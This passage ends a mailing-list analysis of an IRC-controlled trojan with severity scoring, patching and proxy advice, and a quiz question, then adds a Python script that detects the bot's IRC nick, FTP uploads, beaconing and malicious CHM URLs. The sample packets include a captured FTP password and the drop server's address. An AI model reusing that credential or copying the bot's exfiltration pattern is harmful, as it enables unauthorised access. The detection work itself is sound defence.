> 8. Severity
>
> Severity = (criticality + lethality) - (system countermeasures +
> network countermeasures)
>
> Criticality:
> Since this was a VMWARE box whose sole existence was predicated on
> running this trojan, the criticality is 1.
>
> Lethality:
> Since this trojan appears to offer remote access to somebody on an IRC
> channel, this box is about as owned as it gets. Therefore, the
> lethality is a 5.
>
> System Countermeasures:
> Since this box didn't have any updates installed on it or any antivirus
> software, its score in this area is a 1.
>
> Network Countermeasures:
> There were not any network countermeasures in place. Score a 1 here.
>
> Severity = (1 + 5) - ( 1 + 1 ) = 4
>
>
> 9. Defensive recommendation
>
> Always keep the systems' patch level up to date. A current patchset
> would have prevented the URL from downloading the hostile CHM file and
> subsequently prevented the trojan from being installed.
>
> Also, up-to-date antivirus software would have correctly identified the
> website as having malicious code on it (verified with both McAfee and
> Symantec) and prevented the webpage from working.
>
> Passing all web traffic through an application proxy that was capable
> of screening for the hostile CHM URL format would also have prevented
> the attack from being successful.
>
> 10. Multiple Choice Question
>
> Your IDS alerts you that a machine on your network is attempting to FTP
> files whose name appears to be some sort of timestamp. Your site
> doesn't have a policy when it comes to transferring files out of your
> network. Should you
>
> A) Call the networking group and have the machine disconnected
> immediately?
> B) Block the destination host at the firewall?
> C) Call the system's owner and verify it is authorized activity?
> D) All of the above.
>
> Answer: C. Unless you are absolutely certain that the activity is
> hostile, you should call the system's owner to verify that the activity
> is NOT authorized, especially since your site doesn't have a policy on
> the subject. You never know if a machine outside of your control is
> supposed to be sending periodic files to a remote server unless you
> verify first.
>
> _______________________________________________
> Intrusions mailing list
> Intrusions@xxxxxxxxxxxxxx
> http://www.dshield.org/mailman/listinfo/intrusions
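The detection logic a responder would want from the write-up above, as an added Python example that is not part of Skip's post or of any tool it mentions. It parses `tcpdump -x` style output in the same layout as the detects in section 5 into TCP payloads, flags the IRC `NICK X-bot...` registration, the cleartext FTP credentials and the timestamped `STOR` upload, tests a list of connection times for the 30-minute (within 3 seconds) beacon interval described in section 2, and gives the kind of URL screen the proxy recommendation in section 9 describes. The two packets in the constructed sample reuse the hex of the post's NICK and PASS packets; the connection times, the `example.invalid` URL and every function name are my own assumptions.

```python
import re

# Constructed sample in the 'tcpdump -x' layout used in the post: a header line
# followed by offset / hex / ASCII lines. The hex of these two packets is copied
# from the post's IRC NICK and FTP PASS packets; everything else here is assumed.
SAMPLE_DUMP = """\
23:12:48.937192 IP 10.10.10.138.1106 > 216.55.161.45.34902: P 1:23(22) ack 1 win 17520 (DF)
0x0000 4500 003e 0409 4000 8006 f6b0 0a0a 0a8a E..>..@.....E.A.
0x0010 d837 a12d 0452 8856 d8f3 5e67 f22f 5fa8 .7.-.R.V..^g./_.
0x0020 5018 4470 f283 0000 4e49 434b 2058 2d62 P.Dp....NICK.X-b
0x0030 6f74 3939 3238 2d35 3939 3539 0d0a ot9928-59959..
22:28:10.190827 IP 10.10.10.138.3604 > 216.55.161.45.ftp: P 14:31(17) ack 55 win 64186 (DF)
0x0000 4500 0039 4f1e 4000 8006 aba0 0a0a 0a8a E..9O.@.....E.A.
0x0010 d837 a12d 0e14 0015 1ff2 0706 ee09 a2b2 .7.-............
0x0020 5018 faba 62ed 0000 5041 5353 204d 6e37 P...b...PASS.Mn7
0x0030 507a 3431 5f63 6c0d 0a Pz41_cl..
"""

# Constructed SYN times (same day) of the bot's check-ins to one destination.
BEACON_TIMES = ["22:28:09.964008", "22:58:11.20", "23:28:10.05", "23:58:08.90"]

HDR_RE = re.compile(r"^(\d\d:\d\d:\d\d\.\d+) (?:IP )?(\S+) > ([^:\s]+):")
HEX_RE = re.compile(r"^0x[0-9a-f]{4}\s+(.*)$")
HEX_TOKEN = re.compile(r"[0-9a-f]{2,4}")
NICK_RE = re.compile(rb"^NICK (X-bot\d+-\d+)\r?\n", re.I)
FTP_RE = re.compile(rb"^(USER|PASS|STOR|MKD|CWD) (\S+)\r?\n", re.I)
TIMESTAMP_NAME = re.compile(r"^\d\d-\d\d-\d{4}-\d\d-\d\d-\d\d\.txt$")


def parse_dump(text):
    """Return [(time, src, dst, tcp_payload)] for each packet that carries a hex dump."""
    packets, cur = [], None
    for line in text.splitlines():
        m = HDR_RE.match(line)
        if m:
            cur = {"time": m.group(1), "src": m.group(2), "dst": m.group(3), "raw": bytearray()}
            packets.append(cur)
            continue
        m = HEX_RE.match(line)
        if m and cur is not None:
            for tok in m.group(1).split():
                if not HEX_TOKEN.fullmatch(tok):
                    break  # first non-hex token is the start of the ASCII column
                cur["raw"] += bytes.fromhex(tok)
    out = []
    for p in packets:
        raw = bytes(p["raw"])
        if len(raw) < 40:
            continue
        raw = raw[: int.from_bytes(raw[2:4], "big")]  # trust the IP total length, not the columns
        ihl = (raw[0] & 0x0F) * 4  # IP header length
        doff = (raw[ihl + 12] >> 4) * 4  # TCP data offset
        out.append((p["time"], p["src"], p["dst"], raw[ihl + doff:]))
    return out


def inspect(packets):
    """Emit (time, src, alert, detail) for the bot behaviours described in the post."""
    alerts = []
    for t, src, _dst, payload in packets:
        m = NICK_RE.match(payload)
        if m:
            alerts.append((t, src, "irc-bot-nick", m.group(1).decode()))
            continue
        m = FTP_RE.match(payload)
        if not m:
            continue
        cmd, arg = m.group(1).decode().upper(), m.group(2).decode(errors="replace")
        if cmd == "PASS":
            alerts.append((t, src, "ftp-cleartext-password", "<redacted>"))
        elif cmd == "USER":
            alerts.append((t, src, "ftp-cleartext-user", arg))
        elif cmd == "STOR" and TIMESTAMP_NAME.match(arg):
            alerts.append((t, src, "ftp-timestamped-upload", arg))
    return alerts


def _to_seconds(hhmmss):
    h, m, s = hhmmss.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def is_beaconing(conn_times, period_s=1800.0, tolerance_s=3.0, min_intervals=3):
    """True when at least min_intervals gaps between connections sit within period_s +/- tolerance_s."""
    secs = sorted(_to_seconds(t) for t in conn_times)
    gaps = [b - a for a, b in zip(secs, secs[1:])]
    return sum(1 for g in gaps if abs(g - period_s) <= tolerance_s) >= min_intervals


def is_hostile_chm_url(url):
    """Proxy-style screen: an ms-its: URL that addresses a page inside a remote .chm."""
    return url.lower().startswith("ms-its:") and ".chm::/" in url.lower()


if __name__ == "__main__":
    for alert in inspect(parse_dump(SAMPLE_DUMP)):
        print(alert)
    print("beaconing:", is_beaconing(BEACON_TIMES))
```

The parser truncates each packet to the IP total length rather than trusting the column layout, which keeps a stray ASCII column that happens to look like hex from corrupting the payload; the PASS alert deliberately redacts the credential so the alert log itself does not become a second place the password sits in cleartext.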

